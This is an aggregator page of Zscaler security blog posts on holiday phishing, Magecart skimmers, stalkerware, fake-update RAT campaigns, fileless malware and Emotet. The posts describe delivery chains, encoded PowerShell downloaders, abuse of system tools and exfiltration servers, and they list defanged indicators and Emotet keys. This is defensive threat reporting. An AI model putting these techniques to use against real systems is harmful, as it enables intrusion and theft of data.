Security Posts

Infocon: green

E-mail from Agent Tesla
Categorías: Security Posts

A Big Day for Phishing

Zscaler Research - Hace 1 hora 14 mins
We hope you enjoyed your own Black Friday and found everything you wanted as you were shopping the sales. The threat actors certainly attempted to take advantage of the zeal of holiday shoppers. As a follow-up to our previous blog on shopping scams, we’d like to show some of the other attacks we saw during the Thanksgiving break. We’ll highlight a few more phishing tactics commonly used, a Magecart POS skimmer attack on a major brand, and further evidence of Emotet’s prevalence in the overall threat landscape. The primary motivation of attackers is to take advantage of the online shopping season. Sales are already up for most retailers as consumers snap up deals. Fig 1: Shopping trends continued to rise through November (the spike at the end is Cyber Monday)   Scams and phishing attempts continue at a steady pace into the holiday shopping season. Attackers know that they can cast a wide net of branded phishing attacks, gift card scams, and malicious files to boost their profitability every year. Fig 2: Phishing attempts rose during the week before Thanksgiving and Black Friday   Magecart Magecart has been quite active so far. We have observed consistent hits in the weeks leading up to the holiday season and they persist. The chart below shows that Magecart infections are proving to be quite a sustainable means for attackers. Fig 3: Magecart activity tracked over two months (Oct-Nov 2019)   Recently, threat actors targeted the Macy's website. Macy's released a “Notice Of Data Breach” on November 14, 2019. The company stated that the site was compromised by attackers on October 7, 2019. The attackers had inserted an obfuscated version of a Magecart script to the Macy's Checkout and My Wallet pages. According to the breach notice, attackers were able to capture user credit card data. The user-submitted details were exfiltrated to a command-and-control (C&C) server at barn-x[.]com.   Phishing As we reported in the previous blog, Amazon has been heavily targeted this season, but it isn’t the only brand under attack. All major brands are considered fair game to threat actors. This season, Apple has become a focus of attackers. Below is one such case. Fig 4: Fake Apple login page One of the first things you should do before logging into sensitive websites is to check the address bar to ensure you are in the correct place. If you are unfortunate to enter your Apple ID into this portal, your information will be sent to the attackers. Fig 5: Information is sent in clear text to the attackers as well as any other attackers currently performing a man-in-the-middle (MitM) attack   After a phishing attack is successful, users get redirected to a message about their account being locked.   Fig 6: after entering Apple login information, the user receives a message from the attacker saying the account has been locked   Black Friday Phishing Black Friday offers aren’t just big in the U.S.—the start of the shopping season is celebrated all around the world. The image below shows a phishing page claiming to offer Black Friday deals from Americanas.com.br, a major Brazilian retail chain. Notice the domain: the entire content is hosted on Joomla. A legitimate vendor would never host its products via a content management/publishing framework. Fig 7: Faked Americanas site being hosted on Joomla The screen below is another example of threat actors targeting users via a fake Americanas.com.br site. As of the writing of this blog, the domain hosting this page was only five days old. Fig 8: Faked Americanas site on a newly registered domain   Emotet In our previous blog, we discussed how webmail was a critical element in Emotet infection downloads. Another attack vector favored by threat actors is leveraging compromised WordPress sites—specifically, SSL-secured WordPress sites. Attackers assume (correctly, in many cases) that consumers don’t have a security solution that inspects encrypted traffic (HTTPS). In fact, when you look at the last 1,000 confirmed Emotet samples on URLhaus, 475 of them at the time of this research were using HTTPS to infect users. Fig 9: HTTPS is the primary method of infection   Conclusion The Zscaler ThreatLabZ team will continue to track and block various campaigns and tools used by threat actors. We work diligently to protect our customers from these malicious attacks. Users should be cautious and protect themselves, particularly during the shopping season, by reviewing our security checklist: Change your passwords for critical and important accounts Enable two-factor authentication, or “2FA” Ensure HTTPS is inspected by your security solution; check for HTTPS/secure connections when visiting shopping/e-commerce/financial websites Be vigilant about invoices/orders arriving in email; do not forward such attachments to anyone and be sure to follow IT protocol Be vary of tracking number links in emails from shipping/courier companies, as they may direct you malicious sites Do not click on any links from unrecognized senders; even if you do not follow through, the action of clicking the URL is a beacon for the attacker Do not provide any credentials via Google docs; legitimate vendors do not ask for credentials via this medium Avoid using public or unsecured Wi-Fi connections for shopping Review helpful instructions by the Federal Trade Commission (FTC) on Identify Theft, Recognizing and Avoiding Phishing Scams, and Understanding Mobile Apps and Malware Review the National Cybersecurity and Communications Integration Center's (NCCIC) Holiday Scams and Malware Campaigns warning and recovery actions message Report incidents to the FTC  
Categorías: Security Posts

A New Wave of Stalkerware Apps

Zscaler Research - Hace 1 hora 14 mins
Recently, the U.S. Department of Homeland Security (DHS) released an article warning mobile users about the increasing use of spyware apps.  The US-CERT (Computer Emergency Response Team) issued the following statement:     The statement was released just after the Federal Trade Commission (FTC) marked its first case against stalking apps (also known as stalkerware or spyware apps). A case was filed against a company that developed and distributed stalking apps that could track smartphone activities like call history, text messages, photos, locations, browser history, and more. These apps were marketed as apps for monitoring the location and activities of children, employees, or spouses. According to the FTC's complaint, the company did not take steps to ensure that purchasers were using the apps for legitimate purposes. During the timeframe when the US-CERT released its statement, we noticed some hits on the Zscaler cloud in relation to spyware activities. We frequently detect the presence of spyware apps such as Spymie, TruthSpy, iSpyoo, GuestSpy, Spynote, NeoSpy, among others, on the Zscaler cloud, but we also found some new actors in this period. In this blog, we will briefly discuss these new spyware apps. The blog is divided into three parts. First, we discuss typical stalkerware functionalities, then we'll explore some of the different types of spyware apps we've seen in the last few months, and in the final part we'll cover the indicators of compromise (IOCs). Stalkerware (stalking apps or spyware), as the name suggests, is a type of app that spies on victims. Stalkerware apps are capable of, but not limited to, performing the following functions:   Stealing contacts Spying on text messages Stealing photos Spying on browsing history Spying on banking apps Stealing GPS locations Normally, one is required to have physical access to a mobile device in order to install spyware apps, but an attacker can use social engineering tactics to get the victim to install spyware.  Once installed, the typical spyware app will typically gain admin-level access, hide itself, spy on the victim, and, finally, send the stolen data to the attacker.  The following is an abstract about some spyware apps we found on the Zscaler cloud.    Android Monitors Package Name: com.ibm.fb Hash : 97c6c8b961d57d4ebad47f5c63ec6446 We saw multiple entries of spyware apps dubbed Android Monitors. Upon looking at the icon, we believe it is in its development phase. Once installed, it cleverly safeguards itself from Google's security framework, Play Protect.     Fig 1: Android Monitor initial setup   The screenshot below shows the functionality of the app's keylogger. If enabled, this app can spy on everything that the victim types, which can include personal WhatsApp messages, Facebook chats, emails, banking activities, and much more.   Fig 2: Android Monitor keylogging   The above screenshot also has an email ID column to which all the stolen data is sent. The Zscaler analytical system precisely detects this spyware. The following screenshot highlights the main functionalities of the app. Fig 3: Zscaler Cloud Sandbox with Android Monitor sample   Russ City Package Name: city.russ.alltrackercorp Hash: 3b388138584ad3168e745097d5aa4206 This spyware app portrays itself as Thief Tracker. Further hunting for similar samples from the same source, we found two more apps, named System Info and System Updater. Upon analysis, we noticed that all three apps were the same; their only difference was their names.  The screenshot below shows how the three spyware apps appeared upon installation: Fig 4: Spyware app icons   The complete functionality of this spyware can be seen in its manifest file, below. Fig 5: AndroidManifest.xml    This app performs various background services: Read text messages Get browser history Fetch call logs Get GPS location Get clicked photos Record audio Record voice calls Capture screenshots   Fig 6: Android services   Spy Phone App  Package Name: com.spappm_mondow.alarm Hash : 001209b1e2760f88f2bb4b68f159a473 This app was delivered via Google Drive and contained almost all possible spyware functionalities, as shown in the screenshot below: Fig 7: Zscaler Sandbox displaying Spy Phone analysis   We found its platform online where the attacker can log in and check all the stolen data stored in this one place.  Fig 8: Spy Phone App control panel   Wi-Fi Settings Package Name: com.wifiset.service Hash : 8dab7a558f91e72e3edae8e20ee55c86 This stalkerware portrays itself as a settings app for Wi-Fi. One unique feature of this app is its method for staying persistent. During the installation process, it installs an additional app named Update Settings.  The screenshot below shows this functionality in action. Fig 9: Initial installation steps Once the initial setup is done, the attacker can enter his/her credentials and leave the rest on spyware. As soon as the spyware gets an internet connection, it starts sending the stolen data to a command & control (C&C) center/server. We noticed a major flaw with this spyware. It sends all the stolen data over plain-text (HTTP), which compromises the victim's data at the secondary level. As shown in the following screenshot, the user credentials are sent in plain text:   Fig 10: Plain text communication The screenshot below shows stolen photos being uploaded to the C&C server with basic Base64 encoding. Fig 11: Spyware uploading photos from the victim's device   Data Controller  Package Name: lookOut.Secure Hash : 33dcfd84589c6ccf00fa5a302cefd0fe This app portrays itself as Data Controller and has the package name lookout.Secure. It is strange to see a  package called Lookout, as a legitimate company called Lookout is a highly regarded mobile security company. The attacker might have used this package name in order to trick users into trusting the app. Once installed, it asks for the purpose of use and whether the attacker wants to keep it hidden from the victim or not. (Spyware always prefers to hide itself to evade detection.)   Fig 12: Initial installation steps The Zscaler Cloud Sandbox report shows the major spying capabilities in this spyware: Fig 13: Sandbox report of the Data Controller app   Auto Forward  Package Name: com.autoforward.monitor Hash: 66dbd2d7614555440b657ae24527034a It's common for spyware apps to portray themselves as parental-control apps. This is the case with Auto Forward spyware. As soon as the spyware is installed, it displays itself as an app named Device. It asks for all available permissions necessary to spy, as shown in the screenshot below:    Fig 14: Initial installation steps On its official website, Auto Forward assures users that the spyware works on both Android and iOS platforms. Once installed, it steals the personal data of the victim and forwards it to its server, where the attacker can easily view stolen data such as text messages, WhatsApp activities, GPS locations, photos, a list of installed apps, and so on.    Conclusion Spyware apps often portray themselves as parental-control apps or apps that can monitor employee whereabouts or the activities of a spouse suspected of cheating. Although there are legitimate uses, such as parents monitoring their children's location, these types of apps are often used maliciously.  Most of the spyware in this report were not properly designed. They store stolen data on a server without any security, which creates a single point of failure. Worse, a single instance of compromise can leak every victim's data into the wild.  Secondly, we observed the stolen data being transferred to C&C servers over plain-text channels, which can be compromised by man-in-the-middle attacks.  These flaws would not be acceptable with any legitimate app because they threaten the privacy of the users, potentially revealing their personally identifiable information (PII), which is obviously not a concern to the attackers. Smartphone users who suspect their privacy may have been compromised by such apps can consider following these steps:  Use a legitimate antivirus app that is regularly updated Try factory-resetting your device Remove suspicious apps from device administrator list   ( settings --> security --> device administrators)  Zscaler customers are protected from stalkerware apps.     IOCs  Hash 97c6c8b961d57d4ebad47f5c63ec6446 b0e68b66a5ba47612f2a6a33b343503b 93e969ea1118a9d00be7f1c74b50fce9 b44a98af29b021ad5df4ac6cc38fecf5 d4ecbf666d17326deab49f75588e08b3 9eaf38020f898073af1a3ce34226c91f ea1546f34a6cd517dcfec07861b7fb4f 5fbb1b497c5a86815e5e8cc092d09af0 10322c7dea57269d69a85699e0357f5f 3b388138584ad3168e745097d5aa4206 369a17a8e1031101f41cc31caac56b9c ba63ae94bdec93abc144f3b628d151ad 8dab7a558f91e72e3edae8e20ee55c86 001209b1e2760f88f2bb4b68f159a473 33dcfd84589c6ccf00fa5a302cefd0fe 66dbd2d7614555440b657ae24527034a URLs russ[.]city/apks/alltracker_thief_v.6.5.2.apk russ[.]city/apks/systeminfo_v.6.5.2.apk russ[.]city/apks/systemupdater_v.6.5.2.apk 206.41.116[.]121 dwn[.]vys.me            
Categorías: Security Posts

Scamming and Smishing while Shopping

Zscaler Research - Hace 1 hora 14 mins
A few weeks ago, the witches and skeletons that decorated shop windows for Halloween were swept aside and replaced with reindeer and jolly elves. Fir trees supplanted the pumpkins and “Jingle Bells” began drifting from speakers buried under mounts of artificial snow. It all means one thing: the start of the holiday shopping season, which kicks into high gear on Black Friday. Cyber Monday, which began in 2005, has surpassed Black Friday as the biggest shopping day of the year and, not surprisingly, it has become a major target for cybercrime. But in a report our ThreatLabZ researchers did last year, we were somewhat surprised to see the shifting volumes of activity, which spiked a week before Cyber Monday and dropped off significantly on the day itself. We saw this as an example of the increasing sophistication of attack campaigns, as those carrying them out had begun to mirror the strategies of retail marketers. The Zscaler cloud processes about 75 billion transactions a day for our enterprise customers, and though the bulk of the traffic is business-related, the sheer volume gives us a sweeping view of activity across the internet. Since the beginning of November, we have seen a marked increase in what we identify as shopping traffic. We are also seeing activity that could foreshadow a busy holiday season for cybercriminals. This activity includes phishing that’s targeting well-known shopping brands, phishing attacks targeting mobile phones, site skimmers looking to harvest credentials from compromised e-stores, scam sites offering gift cards, and banking Trojans trying to turn your PC or mobile device into an ATM. Figure 1: Shopping traffic on the Zscaler cloud between Oct. 21 and Nov. 17, 2019, averaging nearly 600 million transactions per weekday Phishing activity tends to rise when the shopping season begins, as attackers know that shoppers may be more likely to respond to “special offers” or notifications relating to shipping and similar matters. Threat actors adjust their phishing kits accordingly, sometimes with seasonal messages and designs. We calculated an increase of more than 400 percent in phishing activity between the first 14 days of October and the first 13 days of November. Figure 2: Phishing activity between Oct. 2 and Oct. 14, 2019   Figure 3: Phishing activity between Nov. 2 and Nov. 14, 2019   Three cases of phishing attacks on shoppers Because Amazon is by far the busiest shopping site, it has the highest likelihood of being on the radar of scammers looking to attack a broad audience. Below, we'll discuss some of the ways that attackers are leveraging Amazon’s popularity for their own money-making schemes.   Case 1: Fake Amazon Gift Cards Everyone loves giving and receiving gift cards, but the phony versions being generated by scammers are dangerous. If you were to click the link (as shown below), you would be redirected to a phishing page that will attempt to collect your login credentials. The following scam arrives via email, congratulating the recipient for qualifying to receive a reward for taking an anonymous survey—but, it says, it must be done in five minutes.   Figure 4: Phishing attempt Figure 4a: HTML of the page shows the attempt to pose as an Amazon Gift Card   Case 2: Fake Amazon Login A common way that attackers try to compromise your Amazon account is through the use of an email or site posing as a legitimate Amazon site. Be wary of any emails posing as Amazon Customer Service alerts or payment invoices as these are common hooks attackers will use to appear legitimate and get victims to click their links. ThreatLabZ has been monitoring one campaign that was sending PDF or DOC files to victims in the hopes they would click through and enter their credentials (see the image below). Figure 5: Letter impersonating Amazon in an attempt to capture user credentials   By clicking the link in the letter, you would be redirected through several URL shorteners before eventually landing on a compromised site hosting an “Amazon” phishing kit. The site was down at the time of this publication, but the screenshot from early on in the campaign shows a near-perfect copy of an Amazon login screen that is set up to steal credentials. Figure 6: Faked Amazon login screen   Case 3: Emotet Trojan A popular method that attackers use to target victims is through the use of scam emails or URLs that pretend to be legitimate purchase orders or invoices; these may appear as links or attachments. This has become a common method for distributing one of the most prevalent banking trojans out there, Emotet. The following case actually comes from the site: http://phamthaifood[.]com/4ib60l/Amazon/Orders-details/10_19/. Opening this document in a secured environment still asks the user to enable editing to allow the attack to commence. Figure 7: Allowing active content of suspicious files is not recommended An analysis of the document in question provides a glimpse into the PowerShell that will execute on the victim's system. Figure 7a:  Malicious PowerShell   The PowerShell mentioned above will download and execute the Emotet trojan. Running this through a dynamic analysis will reveal a malicious attack. Figure 7b: Threat score of Emotet as identified by Zscaler Cloud Sandbox   Once the document is opened, it will execute encrypted PowerShell commands to install the banking trojan onto the victim’s system. We've written extensively about the resurgence of the Emotet malware in earlier blogs.   PayPal Phishing In addition to shopping sites, banking and personal finance sites, such as PayPal, become frequent targets during the holidays. PayPal is one of the most accepted secure payment options used by vendors. Threat actors know this and use it as another primary target for phishing attacks. Some of these attacks are easy to recognize (as shown below) because they are served over non-secure connections using HTTP, which is always a tell-tale sign of a phishing attempt. Figure 8: Faked PayPal login screen   Some attacks, on the other hand, can be quite elaborate, as shown below. They are served over an HTTPS connection and the interface presents a very good reproduction of the official PayPal site. The domain name (paypal.com.hrmy.mtbank[.]shnpoc[.]net) could easily be missed because many people believe that as long as they see “paypal.com,” the site is legitimate. Particularly when viewed on a mobile device, it would be difficult to see that the URL does not belong to PayPal, but “shnpoc.net.” Figure 9: Faked PayPal login screen   The example below appears to be a PayPal site that enables you to sign up for a personal or business account, or even recover your password. But any personal and financial information you enter will be captured by the scammers. Figure 10: Faked PayPal registration screen   Smishing Campaign Many consumers are seeing an increase in order and delivery messages on their mobile devices. Scammers use this opportunity to lure users into revealing personal information through SMS phishing (“smishing”) techniques. With Smishing, attackers send an SMS message to mobile users containing live links that, when clicked, redirect the user to phishing pages and result in credential theft and can lead to financial theft. In the example shown below, we saw SMS messages notifying the user of an online order with a link to follow for more details. Figure 11: Smishing attempt   Once clicked, the user is redirected to cyzoone(.)xyz. This site poses as a poll site to lure victims into entering to win up to $35,000. To take part in the poll, victims have to register using their names.   Figure 12: Smishing attempt using a survey with cash prize   Upon clicking the PARTICIPATE button, the site begins asking poll questions. The questions we observed were about cars, perfumes, and watches, among other things, and can be observed in the following screenshots. Figure 13: Smishing attempt using a survey with cash prize   Once finished with the poll questions, the screen shows the amount that the victim has “won.” Now that the user is fully invested in this deception, the scam starts. The attacker claims, due to payment system limits, that the payment will be sent in two parts. But, to get that amount in full, the user has to pay  $35, as shown in the following screenshot. Figure 14: Scam message saying if you pay $35, you will receive $26,600 Upon clicking the payment button, the scam redirects to a payment page hosted on paybank(.)expert asking the user for a credit card number, CVV number, and the expiration date of the card. Figure 15: Payment screen as part of a smishing scam   After filling out the form and clicking the Pay Now button, the payment information will be sent to the attacker’s site, as shown in the below screenshot. This gives the attackers access to the victim’s account. Figure 16: Scammer’s site   We also checked on the stats of the bit.ly link included in the original SMS message and observed that there were more than half a million clicks on this link in a 24-hour period, which shows the widespread reach of this scam. Figure 17: Clicks on the scammer’s original smishing message   Magecart: Site skimmer Magecart has been active for five years and has been successful injecting JavaScript into target websites to skim for payment information from point-of-sale portals. The injected script can be loaded directly onto the target page or loaded from a remote resource controlled by the attacker. The attack script may be injected in plain text (as shown below) or obfuscated to avoid detection. Figure 18: E-commerce site compromised by Magecart   Magecart malware is capable of tracking cookies to check what data is stored and what data is sent. It also checks for the validity of the payment details entered by a user. If the payment details are valid, the malware proceeds to send the information to the attacker. This attack is smart enough to check for old card details and sends only new information to the attacker. For more detailed insight into the mechanics of Magecart, please check out our analysis here.   Figure 19: Magecart skimmer    Conclusion The ThreatLabZ team at Zscaler will continue to track and block various campaigns and tools used by threat actors to target users. We work diligently to protect our customers from these malicious attacks. Users should be cautious and protect themselves by reviewing our security checklist, particularly during the shopping season: Verify the authenticity of the URL or website before accessing it. Be wary of links with typos. Check for HTTPS/secure connections when visiting shopping/e-commerce/financial websites. All legitimate vendors/retailers and payment portals use HTTPS connections for their transactions. Enable two-factor authentication, or “2FA,” to provide an additional layer of security, especially for sensitive accounts related to financial transactions. As a rule of thumb, don't click links or open documents from unknown parties who promise exciting offers and opportunities. Avoid visiting URL shortener links. Always ensure that your operating system and web browser are up to date and have the latest security patches installed. Use a browser add-on, such as Adblock Plus, to block malvertising (compromised/malicious website bombard visitors with pop-up ads). Only download apps from official app stores, such as Google or Apple. Avoid using public or unsecured Wi-Fi connections for shopping. Back up your documents and media files. You can always go the extra mile by encrypting your files. Review helpful instructions by the Federal Trade Commission (FTC) on Identify Theft, Recognizing and Avoiding Phishing Scams, and Understanding Mobile Apps and Malware. Review the National Cybersecurity and Communications Integration Center's (NCCIC) Holiday Scams and Malware Campaigns warning and recovery actions message. Report incidents to the FTC.      
Categorías: Security Posts

NetSupport RAT installed via fake update notices

Zscaler Research - Hace 1 hora 14 mins
Recently, the Zscaler ThreatLabZ team came across two campaigns designed to trick users into downloading a Remote Access Trojan (RAT) via a fake Flash Player update and a font update. These campaigns are designed to inject malicious redirector scripts into compromised content management system (CMS) sites. These sites use popular programs, such as WordPress, Joomla, Drupal, and others, and are being attacked as a result of vulnerabilities introduced by plugins, themes, and extensions, something we’ve discussed previously on this blog. The two malware campaigns we examine in this blog deliver a payload designed to steal sensitive information. The following figure depicts the hits on the various compromised sites. Overall, Zscaler has blocked nearly 40,000 of these attempts in the past three months. Figure 1: The number of hits on the various types of compromised CMS sites: WordPress (green), Joomla (gold), Drupal (blue), and other CMS sites (orange) Method 1: Fake Flash Player update campaign In this attack, cybercriminals hacked WordPress sites using the theme plugin vulnerability and injected two malicious redirect scripts in the compromised site. By using either one of the scripts, the attackers will deploy malware at the user’s end. The injected script will redirect to the malware site and download the fake update template script to show a fake Flash Player update alert to the user over the compromised site. Figure 2: A compromised WordPress site with the fake Flash Player update page   The following figure shows the source code of the compromised website with the injected scripts. Figure 3: The injected redirector scripts in a compromised CMS site   The first injected script will direct the user to click.clickanalytics208[.]com to download the fake update template. If it fails to meet the attacker's checkpoints, such as geolocation and network settings, then it will execute the next injected script. Figure 4: The first injected malicious script redirects to the click.clickanalytics208[.]com site   The second injected script will redirect to the chrom-update[.]online site and will download the fake update template script from the malicious site. Figure 5: The second injected malicious script redirects to the chrom-update[.]online site   The attacker will send the template.js file as a layer of the compromised site with a fake update page. The fake update page template will be displayed based on the particular variable’s value, also called a “banner.” Figure 6: The default template.js code [banner value = 1: browser update; 2: font; 3: Flash]   The fake template page will display an alert to try to trick the user into starting the update. Once the user clicks the "Update" button, the script downloads the malicious HTA file from the specified URL.  Figure 7: A fake Flash Player update page with the link to download malicious HTA file   If the user clicks the "Later" button, the redirect still occurs, taking the user to the same page to download the malicious HTA file. The following figure depicts the source code of the template.js with the link to download the malicious HTA file with the banner value 3. Figure 8: The source code of the template.js script from the redirection URL (chrome-update[.]online)   Once the user runs the HTA file, it will also run the PowerShell application using the command prompt and download the RAT payload from the specified URL. Figure 9: The source code of the downloaded malicious HTA file   Figure 10: The obfuscated content responsible for the malware download   Figure 11: The deobfuscated code showing the download link   Figure 12: Step 1 of the malware payload installation process   Figure 13: Step 2 of the malware payload installation process   Figure 14: The NetSupport RAT malware running as a client-side application   Finally, the installed RAT malware will send the victim's information in an encrypted format to the attacker’s site (hxxp://179.43.146[.]90/fakeurl.htm) to enable remote access of the victim’s machine, as shown in Figure 15 below. Figure 15: The captured user data is transferred to the attacker’s site in an encrypted format Figure 16: The overall traffic of the fake Flash Player update malware campaign   The attackers were also tracking the visitor count, as shown in Figure 17 below. So far, 113,000 unique users were affected by this malware attack. Figure 17: The affected user count   Method 2: Fake font update campaign In this attack, the cybercriminals will directly inject the fake update template script by exploiting the legitimate site to evade detection. As mentioned earlier, the template script logic will identify which browser is being used. While accessing the compromised site via Chrome, the user will receive an alert that the “PT Sans” font wasn’t found.   Figure 18: The compromised site with a fake font update page (Chrome)   The same site was accessed via Firefox and shows the same alert to the user in the Firefox template. Figure 19: A compromised site with a fake font update page (Firefox)   The following image shows the source code of the compromised site with the injected template script.   Figure 20: The template.js is injected directly into the compromised site   The source code of the template.js script shows a banner value “2” and has a link (sreex[.]info/update.exe) to download the malware payload. Figure 21: The source code of the template.js script with the malware download link   Figure 22: After clicking the update button, the malware payload will be downloaded (via update.exe)   The following activities were observed while executing the downloaded Trojan. Figure 23: The program created a process “gdsun.exe”  from the malware payload (a self-copy of the payload)   Figure 24: The malware creates a copy of the payload in the %ProgramData%/ folder   Figure 25: It also creates a startup registry entry for the dropped malware   It will post the following collected user data to (clickies(.)site/CC/index(.)php), which is operated by the attackers. Figure 26: Post-infection callback traffic   Figure 27: The overall traffic of the fake font update campaign   Conclusion In today's digital world, a company's website is its most valuable asset. Therefore, it is critically important for companies to protect this public face from an attack that could put your business, employees, and your customers at risk. Zscaler has blocked more than 40,000 malicious attacks related to this campaign in the past three months. Figure 28: The Zscaler Risk Analyzer score for the malware payload download URL   IOCs URLs: click.clickanalytics208(.)com chrom-update(.)online asasasqwqq(.)xyz bitbucket(.)org/execuseme1/1312/downloads/download.hta xyxyxyxyxy(.)xyz/wwwwqwe/11223344.exe 179(.)43(.)146(.)90/fakeurl(.)htm sygicstyle(.)xyz sreex(.)info/update(.)exe clickies(.)site/CC/index(.)php   Malware payload: 5ad69da64dacdf87c5bdea12a20ca8fd4d34e6a16c37dfbb9a2af8df79901504(download.hta) 9c69a1d81133bc9d87f28856245fbd95bd0853a3cfd92dc3ed485b395e5f1ba0(11223344.exe) ea137c0079624de8d2f8b174d44f90faa58c4eda558f7d5db0efa742f36c2cdf(update.exe)  
Categorías: Security Posts

Fileless malware campaign roundup

Zscaler Research - Hace 1 hora 14 mins
Criminals frequently get caught because they leave evidence at the scene of the crime—fingerprints, DNA, and the like. Cybercriminals are no different, often leaving files behind on the systems they infect. In an effort to reduce the evidence left behind after an attack, cybercriminals developed fileless malware, a variant of computer-related malicious software that exists exclusively as a computer memory-based artifact. In short, the infection or malware does not write any executable files to the infected system’s hard drive. By leaving few traces behind, malware authors try to postpone detection by security vendors for as long as possible.  During the past few years, the use of fileless infection has been adopted by numerous forms of malware and advanced persistent threats (APTs). These fileless infection chains can employ multiple techniques to deliver the final payload. In one example, the Kovter Trojan stored the payload in a Windows registry. The Hancitor Trojan wrote a payload in the hollow process spawned by shellcode injected from a Word document macro in a Microsoft Word process. Lately, we have been seeing an increase in fileless infection techniques that are leveraging legitimate applications available in the victim’s machine. These techniques do not rely on storing executable files and leave no direct traces on disks, making detection and removal a challenge. In this blog, we will discuss the recent malware campaigns that have used fileless infection mechanisms leveraging legitimate applications. Figure 1: Stats showing hits of fileless infection chains Case 1: njRat Backdoor Although njRat has been around for a long time, we recently observed that this backdoor is being loaded by a fileless infection chain. A .docx file is received as an attachment in a phishing email by the victim. Once the .docx file is opened, the infection cycle begins. Figure 2: The njRat payload loaded by fileless infection   The .docx file contains external references to remote OLE objects to be referenced in the “document.xml.rels,” which is a Rich Text Format (RTF) exploit CVE-2017-0199 that further opens the embedded .doc file containing a Visual Basic for Applications (VBA) macro. Figure 3: The .docx downloading an RTF file   The VBA macro contains an encoded PowerShell script. It downloads the VBScript from “www[.]m9c[.]net/uploads/15676549681.jpg.”  The VBScript then decodes and executes the embedded PowerShell script. The PowerShell script then downloads the encrypted Portable Executable (PE) file from “www[.]m9c[.]net/uploads/15676547971.jpg,” which is the njRat executable. Figure 4: The VBS PowerShell downloads an encoded PE file This VBScript decrypts the PE file, which is a .NET executable that is directly loaded in the memory and runs in the context of an MSbuild.exe. No traces of a disk write are observed and the backdoor njRat silently executes under the hood by communicating with the CnC server “borapegar147[.]ddns[.]net”.   Case 2: Sodinokibi Ransomware The Sodinokibi ransomware (also known as REvil) is one of the most well-known ransomware types in the wild today. It has been on the rise since the threat group behind the malware operation GandCrab announced that it had shut down its operations at the end of May. Recently, we have noticed that Sodinokibi has adopted a fileless mechanism. Figure 5: The Sodinokibi payload loaded by a fileless infection   The fileless infection cycle starts when the victim clicks the BAT file that is received as an attachment in a phishing email. The BAT file contains a PowerShell script containing Base64 encoded expressions. Figure 6: The BAT file received via MalSpam   As shown below in the decoded PowerShell script, this script downloads another PowerShell script containing more than 3,000 lines of code and a Base64-encoded portable executable file (PE) from a pastebin URL and loads it while invoking a function that initiates the attack in the system's memory. Figure 7: The decoded PowerShell expressions   Figure 8: The encoded PE file in PowerShell downloaded from the pastebin This script decodes and provides the PE file to a loader function, which takes care of injecting this file directly into the system's memory. The loaded PE file, which appears to be a DLL, is actually Sodinokibi ransomware. We see no traces of the DLL being saved on the disk as the ransomware silently starts encrypting files on the system.   Case 3: Astaroth Backdoor The Astaroth Trojan is known for stealing credentials, keystrokes, and other system information. An analysis of the backdoor and the infection cycle is covered in detail by Microsoft. The infection chain starts with a victim clicking on an LNK file that is delivered via a phishing email. This LNK file contains an obfuscated WMIC command, which downloads an XSL file containing obfuscated JavaScript.   Figure 9: The obfuscated WMIC command   This JavaScript code downloads a Base64-encoded payload by abusing the Bitsadmin tool and decodes it using the Certutil tool. The payloads are XOR-encrypted PE files except one of the DLL files, which is loaded by leveraging the Regsvr32 tool. Finally, this DLL file decrypts the payload of the backdoor Astaroth and maps it in the Windows userinit process. Figure 10: Obfuscated JavaScript in an XSL file   During the entire attack chain, only system utilities are leveraged to load the final payload. The Astaroth payload executes silently without traces on the filesystem. The case studies described above are based on techniques that take advantage of legitimate applications, such as PowerShell and Windows Management Instrumentation (WMI). However, there are other techniques in which the payload is stored in the registry and delivered by taking advantage of zero-day vulnerabilities in applications or in the operating systems themselves. In one example, the famous Equifax breach used a vulnerability in Apache Struts to deliver the payload. As the PowerShell scripts were stored in the registry, there was no direct trace of the malware being stored.   Conclusion Fileless infection campaigns are difficult to detect. That's why the Zscaler ThreatLabZ team continually monitors malware delivery mechanisms from several sources to ensure that Zscaler customers are protected.     
Categorías: Security Posts

Emotet is back in action after a short break

Zscaler Research - Hace 1 hora 14 mins
It’s common for cybercriminals to launch an attack, then shortly thereafter stop the campaign before they are detected. These breaks also give these bad actors a chance to change tactics to, once again, attempt to avoid detection. That’s what operators using the Emotet malware did, taking a short break before bringing Emotet back in a new, more dangerous form. Emotet operators took about a two-month break as command and control (C&C) servers went down in late May and came back online around the end of August. Then, we began observing a new version of this malware around mid-September. Emotet started as a banking trojan in 2014. However, it has morphed into a very prominent threat. Now, it is mostly used for spamming and downloading additional malware threats on a target system. Based on the unique sample count of malware threats seen by the Zscaler Cloud Sandbox, Emotet and its downloaders appear to be among the most prevalent threats in 2019, followed by banking trojans and loaders, such as TrickBot and Ursnif, remote-access trojans (RATs), and off-the-shelf password stealers, such as LokiBot and AZORult. Emotet is modular by design, as it supports multiple modules for different tasks, such as stealing information, spamming, and more. It is also known to download and to be downloaded by other malware families, such as TrickBot and Ursnif. It has also been associated with the Ryuk ransomware.   Email conversation hijacking This year, Emotet employed a new tactic of using stolen email content in spam campaigns. The hijacking of existing email threads can be very effective as recipients are tricked into believing that the email was sent by the other person in the email thread. This trust factor can lead to the victim opening the email (and attachment) and getting infected with Emotet, effectively making the infected system part of an Emotet botnet. Figure 1: Emotet activity from the beginning of June 2019 to mid-September 2019. Figure 2: The new Emotet campaign after the break.   New campaign, new document templates, and new botnets? We observed the following new templates in spammed malicious documents (maldocs) during this new campaign.    Figures 3 and 4: New macro templates (Product Notice and Protected View)   Earlier, there were two Emotet botnets, known as Epoch 1 (E1) and Epoch2 (E2), that were using unique RSA keys to communicate with their C&C. After the break, we noticed three new RSA keys being used, which suggests the possibility of a botnet splitting into multiple botnets. Earlier keys were no longer seen in use and the latest three keys are now being used, which means operators are reorganizing their botnet infrastructure. Already existing RSA keys  -----BEGIN PUBLIC KEY-----\nMHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAMPLgcO0RQdJg/LTgiku57nH4KcLwHCx\nS0lbynOUhHhKjTnmENrMA2idUbK6hI0JRZtii9oJSlb3e5NZiCK+Qr/NB2u7ZNRc\nhG87aibm0ndS9xKDRXcmWwaQkF0PFuOHpwIDAQAB\n-----END PUBLIC KEY----- -----BEGIN PUBLIC KEY-----\nMHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAL9KRKWqcld40xbUZ6hRh+fPNkgJe7K+\n0y1rR0UFqc2SBmnyoR/2Ctd+8MRvU8zri2eNVkVBxCUH1Cthf3AEgRqY2kGva8gJ\nWcqls3j7RztZzqFoL+wM9DNnz/OWuiyPAQIDAQAB\n-----END PUBLIC KEY----- New RSA keys -----BEGIN PUBLIC 